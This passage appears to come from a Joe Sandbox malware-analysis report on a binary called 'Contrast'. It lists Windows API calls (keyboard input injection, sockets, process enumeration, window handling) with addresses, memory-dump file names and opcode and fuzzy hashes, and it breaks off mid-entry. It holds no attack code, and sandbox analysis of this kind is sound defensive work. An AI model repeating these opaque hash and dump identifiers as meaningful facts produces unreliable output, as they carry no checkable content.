                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,005A0988,000000FF,?,00000000,00000800,00000000,?,005A3C4C,?), ref: 00568345
                                                                                                                                        • _memcmp.LIBCMT ref: 00568366
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 314563124-0
                                                                                                                                        • Opcode ID: 096af0b2b1796bf72871a0e0058682cb8f0d24f32513b023886625907b976af5
                                                                                                                                        • Instruction ID: 2a156f9615518b943afeffaea46a24a7fd56069b35a6c90baab7d5581e782b39
                                                                                                                                        • Opcode Fuzzy Hash: 096af0b2b1796bf72871a0e0058682cb8f0d24f32513b023886625907b976af5
                                                                                                                                        • Instruction Fuzzy Hash: 54812B75A00109EFCB04DFD4C988EEEBBB9FF89315F204558E516AB250DB71AE06CB61
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2808897238-0
                                                                                                                                        • Opcode ID: 20cef9b3e95f751d473fe64607292a57b46ce39bd046c3543f0c040b1945db78
                                                                                                                                        • Instruction ID: 5e2b56be2aa877b17dfe79c7b033c603a1ec1a1c8e056c2358ac0a6ec7bebc0d
                                                                                                                                        • Opcode Fuzzy Hash: 20cef9b3e95f751d473fe64607292a57b46ce39bd046c3543f0c040b1945db78
                                                                                                                                        • Instruction Fuzzy Hash: 9E51A93060870A9BDB209F79D899A2DBBE5BF5D318B209C1FE556C7291EA709880CB05
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0058F526
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0058F534
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0058F5F4
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0058F603
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2576544623-0
                                                                                                                                        • Opcode ID: 1568555da255af8d3d1a75feee9840e32cce94f9d7a08df799b638e9e1a4b9ee
                                                                                                                                        • Instruction ID: f8a87c81cb67b34d50a435eafd18f61b6f5e7b9e30b59e397c5bec34dfb37264
                                                                                                                                        • Opcode Fuzzy Hash: 1568555da255af8d3d1a75feee9840e32cce94f9d7a08df799b638e9e1a4b9ee
                                                                                                                                        • Instruction Fuzzy Hash: 54515EB15047129FD310EF24EC49EABBBE8FF99710F00492DF99597291EB709944CB92
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00599E88
                                                                                                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00599EBB
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00599F28
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                        • Opcode ID: 1f3d534226fa48712879212017f7de8e599e7b47891c25bd802dc141cf6bbab4
                                                                                                                                        • Instruction ID: 7999c1fa7dce7c83ff096dfcf36251be460e1344f35eaf3d8d9327b7992f577b
                                                                                                                                        • Opcode Fuzzy Hash: 1f3d534226fa48712879212017f7de8e599e7b47891c25bd802dc141cf6bbab4
                                                                                                                                        • Instruction Fuzzy Hash: 82512D34A00209AFDF21DF58C9849AE7BB6FB95320F14865EF915DB2A0D730AD91DB90
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2782032738-0
                                                                                                                                        • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                                                        • Instruction ID: a8c5180991d350b71c650ee8adbad5b23efe739c891eda9faaea6fa3a1f538db
                                                                                                                                        • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                                                                                        • Instruction Fuzzy Hash: 7741923260070AABDF28CEA9C894AAF7FA6BF85360F24856DE855C7650D770FD408F44
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0056A68A
                                                                                                                                        • __itow.LIBCMT ref: 0056A6BB
                                                                                                                                          • Part of subcall function 0056A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0056A976
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0056A724
                                                                                                                                        • __itow.LIBCMT ref: 0056A77B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3379773720-0
                                                                                                                                        • Opcode ID: 73529fc863d4c47d7874a6e11809d04529951c276ae9da8b4df777132dad4d19
                                                                                                                                        • Instruction ID: e91ff3c069b87c81a11e7db9ba2920385ffebe8afb96ffcec6a657abf8a3c8ef
                                                                                                                                        • Opcode Fuzzy Hash: 73529fc863d4c47d7874a6e11809d04529951c276ae9da8b4df777132dad4d19
                                                                                                                                        • Instruction Fuzzy Hash: FE418F74A00619ABDF10EF64D84ABEE7FB9FF95750F040029F905A32C1DB709A44CAA6
                                                                                                                                        APIs
                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 005870BC
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 005870CC
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00587130
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0058713C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2214342067-0
                                                                                                                                        • Opcode ID: 579aad64cf74f94102b19baf4917f8d0cbefa250fc4f23559e911712aa3f5d6b
                                                                                                                                        • Instruction ID: ecf4aa5f016a3bf0216c3a6cebe57462f4e4d09b51d61e45ff7cc729cc424264
                                                                                                                                        • Opcode Fuzzy Hash: 579aad64cf74f94102b19baf4917f8d0cbefa250fc4f23559e911712aa3f5d6b
                                                                                                                                        • Instruction Fuzzy Hash: AD41C5757002016FFB10AF24DC8AF6A7BA4FB49B14F148458FA159B3C2D6749C418F90
                                                                                                                                        APIs
                                                                                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,005A0980), ref: 00586B92
                                                                                                                                        • _strlen.LIBCMT ref: 00586BC4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4218353326-0
                                                                                                                                        • Opcode ID: e3afd5120474093c928c453ec5842459839360a02af52a5bc6442d4d0a12ea8a
                                                                                                                                        • Instruction ID: 6ec1183e2c553d16b49f2919129dd85a913bd18e1225291a477b493f8580a7d7
                                                                                                                                        • Opcode Fuzzy Hash: e3afd5120474093c928c453ec5842459839360a02af52a5bc6442d4d0a12ea8a
                                                                                                                                        • Instruction Fuzzy Hash: 5841E83160011AAFC704FB64DD99EAEBFA9FF99310F148155F816A72D2DB30AD41CB90
                                                                                                                                        APIs
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00598F03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                        • Opcode ID: 355181115bcbafe5346a2b7a278a049304a9be8847c3343e984c1131ffd73dc4
                                                                                                                                        • Instruction ID: 3a4598c90eaadd94995171da0dab922a90323c5a2457b91f80bbbfdae6265b68
                                                                                                                                        • Opcode Fuzzy Hash: 355181115bcbafe5346a2b7a278a049304a9be8847c3343e984c1131ffd73dc4
                                                                                                                                        • Instruction Fuzzy Hash: E131DE35611109AEEF209A18CC89FBC3FA6FB0B320F545902FA11D62E1DF71E994DB51
                                                                                                                                        APIs
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 0059B1D2
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0059B248
                                                                                                                                        • PtInRect.USER32(?,?,0059C6BC), ref: 0059B258
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 0059B2C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1352109105-0
                                                                                                                                        • Opcode ID: 073dd9edc571b243c146925aeae426407a25387a548d214612fd56756ba9ce19
                                                                                                                                        • Instruction ID: 3e8ad69af46684e81a9c4aa4153b4b0e7fbb179f42904597acc53e84078e6910
                                                                                                                                        • Opcode Fuzzy Hash: 073dd9edc571b243c146925aeae426407a25387a548d214612fd56756ba9ce19
                                                                                                                                        • Instruction Fuzzy Hash: 32418134A04119DFFF21CF98EA84A9D7FF5FF99310F1484AAE8189B251D730A845DB50
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00571326
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00571342
                                                                                                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 005713A8
                                                                                                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 005713FA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 736eb8f2d2adf00dbaaa4ad785aaf98ca01fd953fc9a4255ac74b62dc787e7d9
                                                                                                                                        • Instruction ID: ee30ebc910ca95ada7e5e5da614ebeee9b120511894e0c5e5f76961636ece15e
                                                                                                                                        • Opcode Fuzzy Hash: 736eb8f2d2adf00dbaaa4ad785aaf98ca01fd953fc9a4255ac74b62dc787e7d9
                                                                                                                                        • Instruction Fuzzy Hash: B5316B30940A08AEFF348A2DAC09BFD7FB5BB85310F04CA0AF489525D0D3748945BB59
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00571465
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00571481
                                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 005714E0
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00571532
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 02d9be382c759d0de4aebb279f27d6352ff91c369b42f1a2b0e71e9b6cbf4837
                                                                                                                                        • Instruction ID: 27b5e70d434c0a032c683c6bbe395e12476741330cb7b5adabb95091fb4e2449
                                                                                                                                        • Opcode Fuzzy Hash: 02d9be382c759d0de4aebb279f27d6352ff91c369b42f1a2b0e71e9b6cbf4837
                                                                                                                                        • Instruction Fuzzy Hash: 1B314B30940A595EFF348A6DBC05BFABFA6BB85310F08C31AE489521D1C3748945BB69
                                                                                                                                        APIs
                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0054642B
                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00546459
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00546487
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005464BD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                        • Opcode ID: 003ca39053cefdeb59825fa90deb1411193fbd7878c18048a8fe099ec23d6c7b
                                                                                                                                        • Instruction ID: 3b93cc645ede3d24f09b1b0c6a8dffd8700c9a802150bd0b0602b69000f44310
                                                                                                                                        • Opcode Fuzzy Hash: 003ca39053cefdeb59825fa90deb1411193fbd7878c18048a8fe099ec23d6c7b
                                                                                                                                        • Instruction Fuzzy Hash: 6631D031600256AFDF258F75CC88BEA7FA5FF42328F154428F82487191EB31E854DB52
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32 ref: 0059553F
                                                                                                                                          • Part of subcall function 00573B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00573B4E
                                                                                                                                          • Part of subcall function 00573B34: GetCurrentThreadId.KERNEL32 ref: 00573B55
                                                                                                                                          • Part of subcall function 00573B34: AttachThreadInput.USER32(00000000,?,005755C0), ref: 00573B5C
                                                                                                                                        • GetCaretPos.USER32(?), ref: 00595550
                                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 0059558B
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00595591
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2759813231-0
                                                                                                                                        • Opcode ID: 2f50a9b2b8e73bc28f7a956ca69dc7b83cf78fd9a646ef85d4d027ea75ea990e
                                                                                                                                        • Instruction ID: 317f4852cd875837a84599b9f666734c63044e785310111cfb2b13797301755a
                                                                                                                                        • Opcode Fuzzy Hash: 2f50a9b2b8e73bc28f7a956ca69dc7b83cf78fd9a646ef85d4d027ea75ea990e
                                                                                                                                        • Instruction Fuzzy Hash: 75312EB1900109AFDB00EFA5DC859EFBBF9FF99314F10446AE515E7241EA71AE448FA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0059CB7A
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0054BCEC,?,?,?,?,?), ref: 0059CB8F
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0059CBDC
                                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0054BCEC,?,?,?), ref: 0059CC16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2864067406-0
                                                                                                                                        • Opcode ID: 795e4c53c9330b5ccb850a2d562d55178ec96ff3f4985d8711485fca2cef601f
                                                                                                                                        • Instruction ID: f2b6d673be2dfc8ce6d7fb17508d371936c80a0bffc52ff54124eaef692d9db0
                                                                                                                                        • Opcode Fuzzy Hash: 795e4c53c9330b5ccb850a2d562d55178ec96ff3f4985d8711485fca2cef601f
                                                                                                                                        • Instruction Fuzzy Hash: 3D318C35600058AFCF259F58C899EBA7FB6FB4E350F44409AF9059B2A1D7319D50EFA0
                                                                                                                                        APIs
                                                                                                                                        • __setmode.LIBCMT ref: 00530BE2
                                                                                                                                          • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577E51,?,?,00000000), ref: 00524041
                                                                                                                                          • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577E51,?,?,00000000,?,?), ref: 00524065
                                                                                                                                        • _fprintf.LIBCMT ref: 00530C19
                                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 0056694C
